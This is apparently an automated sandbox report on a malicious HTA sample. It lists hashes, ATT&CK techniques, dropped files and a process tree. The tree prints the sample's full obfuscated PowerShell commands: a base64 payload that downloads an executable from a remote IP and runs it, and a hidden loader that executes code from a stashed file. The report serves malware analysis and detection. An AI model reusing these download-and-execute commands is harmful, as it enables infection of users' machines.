f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-09-2024 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c443d03e485232a860b726fc83593004.hta
Size

115KB
MD5

c443d03e485232a860b726fc83593004
SHA1

6b556d04962638694402d15b7fa24b6bd6b1d1f4
SHA256

f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
SHA512

3a7201a36b2875c59db6e41369f52c941cd5d0d51bf90fca31abf05f71c76a7d5a6305667649ae8d2f63a3951a44643402853c096b07143531eaa6f6c5bb7c34
SSDEEP

96:Ea+M73rNp6fEVNp60WU1Qgr8l+Qu3i9pNp6R6Np6Er5BfqVNp61AT:Ea+Q35puEnp08QgocyNpJpxCnpxT

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2908	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1032	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2908	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
560	dllhost.exe

Loads dropped DLL 1 IoCs

pid	Process
2908	powershell.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\omdigtendes.udd	dllhost.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\knytt\Ballistics.mus	dllhost.exe
File opened for modification	C:\Windows\resources\villan\Knastakslerne.ini	dllhost.exe
File created	C:\Windows\brandbombernes.lnk	dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2908	powershell.exe
2908	powershell.exe
2908	powershell.exe
1032	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 2744	2936	mshta.exe	30
PID 2936 wrote to memory of 2744	2936	mshta.exe	30
PID 2936 wrote to memory of 2744	2936	mshta.exe	30
PID 2936 wrote to memory of 2744	2936	mshta.exe	30
PID 2744 wrote to memory of 2908	2744	cmd.exe	32
PID 2744 wrote to memory of 2908	2744	cmd.exe	32
PID 2744 wrote to memory of 2908	2744	cmd.exe	32
PID 2744 wrote to memory of 2908	2744	cmd.exe	32
PID 2908 wrote to memory of 1688	2908	powershell.exe	33
PID 2908 wrote to memory of 1688	2908	powershell.exe	33
PID 2908 wrote to memory of 1688	2908	powershell.exe	33
PID 2908 wrote to memory of 1688	2908	powershell.exe	33
PID 1688 wrote to memory of 2636	1688	csc.exe	34
PID 1688 wrote to memory of 2636	1688	csc.exe	34
PID 1688 wrote to memory of 2636	1688	csc.exe	34
PID 1688 wrote to memory of 2636	1688	csc.exe	34
PID 2908 wrote to memory of 560	2908	powershell.exe	36
PID 2908 wrote to memory of 560	2908	powershell.exe	36
PID 2908 wrote to memory of 560	2908	powershell.exe	36
PID 2908 wrote to memory of 560	2908	powershell.exe	36
PID 560 wrote to memory of 1032	560	dllhost.exe	37
PID 560 wrote to memory of 1032	560	dllhost.exe	37
PID 560 wrote to memory of 1032	560	dllhost.exe	37
PID 560 wrote to memory of 1032	560	dllhost.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c443d03e485232a860b726fc83593004.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3h931cn.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1688
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B49.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7B48.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2636
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7B49.tmp

Filesize
1KB

MD5
0d2b3b5ad84470f2463bd438d722f1c5

SHA1
79cf3a560822c78f9be3c2b3fea2026b1993133b

SHA256
d8ed4feaca68256f9676a05cb1c5e49bd3151985f423a615fff3dd41c746ef59

SHA512
a46ce629b9152660a103eec360eb0307d5472b6cd215d237466100a44fdbb4b7483df9e953faed48bfb8323552f268542830a810071e20ce54413fdbd9817654

Download Submit
C:\Users\Admin\AppData\Local\Temp\t3h931cn.dll

Filesize
3KB

MD5
54aa096a525844f6142ffb743b302347

SHA1
7e4743132f098a9829180a7ede780ded7e5d83bc

SHA256
14eea216058b69083f09926010edac5d7801be89374fcc2eee2051c776e3b053

SHA512
429c103d1d667d7c3f953575b2d127e6ba4879ca815f05dc4d4074bc90ec6cb1a95b59a5ab7482a56fe9ae0bca3c2e5a3a0f899b005051d17b4cca3ca3dd54fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\t3h931cn.pdb

Filesize
7KB

MD5
43a3da226a3ab0ceb3f912c8565fc0a2

SHA1
852e76f10c3d32aed9dd0852f7438a1d8ea6d36b

SHA256
92c5e29cd56e554379e51d7eea681ccb6baa219d4ae726decfd97f576e1f2a2f

SHA512
6d047473fcbb311bfaac407b4cc5c4343e9536ab4b59032f88e2e0bb6ec7a7cd8b72bfdb69dc2a8909bc8e6c52f387d5f335ca09e290a88f6adb7b5915c5ab08

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OIWDLJKIKOXOSW24GZVX.temp

Filesize
7KB

MD5
a28a6b89e6e0a70c11f499ab60ce49ff

SHA1
8c48618a2e29e1d006798e545936ecca3f9a6de7

SHA256
f82b642a8b786d2e1865da99818499bb97cc7f95b183c18357fdb008361a97ab

SHA512
f1b29de7afb05ee4117e0d04f5ec0baf0720120343f6af69aa061f74c578516fec4f0c6e7c6cf6654f315c8ccf0fcbb7ad94c1a57c30bd61c1c650df6e89c045

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
92d326964225707b2b6f35626f10ca4c

SHA1
d99d0ced5a85b7e676cf5fe29ac0f82906688149

SHA256
60d47918e46a7f6e5756b47a10a90301a78ba820fe04758448d50e2f868d3333

SHA512
4790a2132200b12df332b71341c1b3a3f6983013ff1188572d34f4e7049519474b1558eb28bbbe9e691fde7c5a160d37358e17d3031b95659f693f2153bf3a76

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
967KB

MD5
450228d72f9f726b645c55bbbc6db905

SHA1
b26075c51a4681f2ff7407188f5e9480545a7aca

SHA256
9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be

SHA512
4795d090447d237cbe1a044ffe78e8cd0c9be358df778673b4713eab2c324056a7701d22b827b95b2413845089fa71ac81a4f47cc8bcdbabad34845e64b4e090

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7B48.tmp

Filesize
652B

MD5
8da990506a74f5a0c4405777c1ab7ca4

SHA1
44e6351eb4c984789269c863f4bd1c85715e3995

SHA256
cb511b61476c091616443bd29074ac80f5d36a8b75a82dc01b2b98691ccb786b

SHA512
27396e1551f5fc6208474d4a9f29326273be78c101c62362e7b75f460fb15ccb6e485a61fdd1fe0f669ecf2424aabd7b6d91989cb781a1e769b4a61daff90b70

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\t3h931cn.0.cs

Filesize
474B

MD5
ed8b0b366b8fd7bdf35fcddb6a6fc768

SHA1
f333be6ecec2ac5315dc3cb28ffe6202e6c3e142

SHA256
f179dbf6f56665e7020a3cf42a5150aed8a15253ccbcf368cdc526c88d90d99b

SHA512
1ace461d8af56f8002e38eb8274f86c026abfbfbd851c93d878d9a211ee727005b98c7236f43e1497c0a654ba45dc87ab6ed3ec49c77b3a3013e771381f523ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\t3h931cn.cmdline

Filesize
309B

MD5
197a0ac4314e6310c5fca6d74d8f7970

SHA1
69023040a5f0fe6cd88d42d4f4bcaa0690f1de3e

SHA256
d80656b993d4bdd9e7cddcbd16def36a9385a4b0875bdaa6a03195b41d163eed

SHA512
c8b3c724e81158d1c8ebf2d79352e38b80c44d149a4ef2da84d2c263cc4bb9b6d256eb5609e17afdd59f7bb61fc742fb8078cc57b7b59f1a19e97ab33e9df761

Download Submit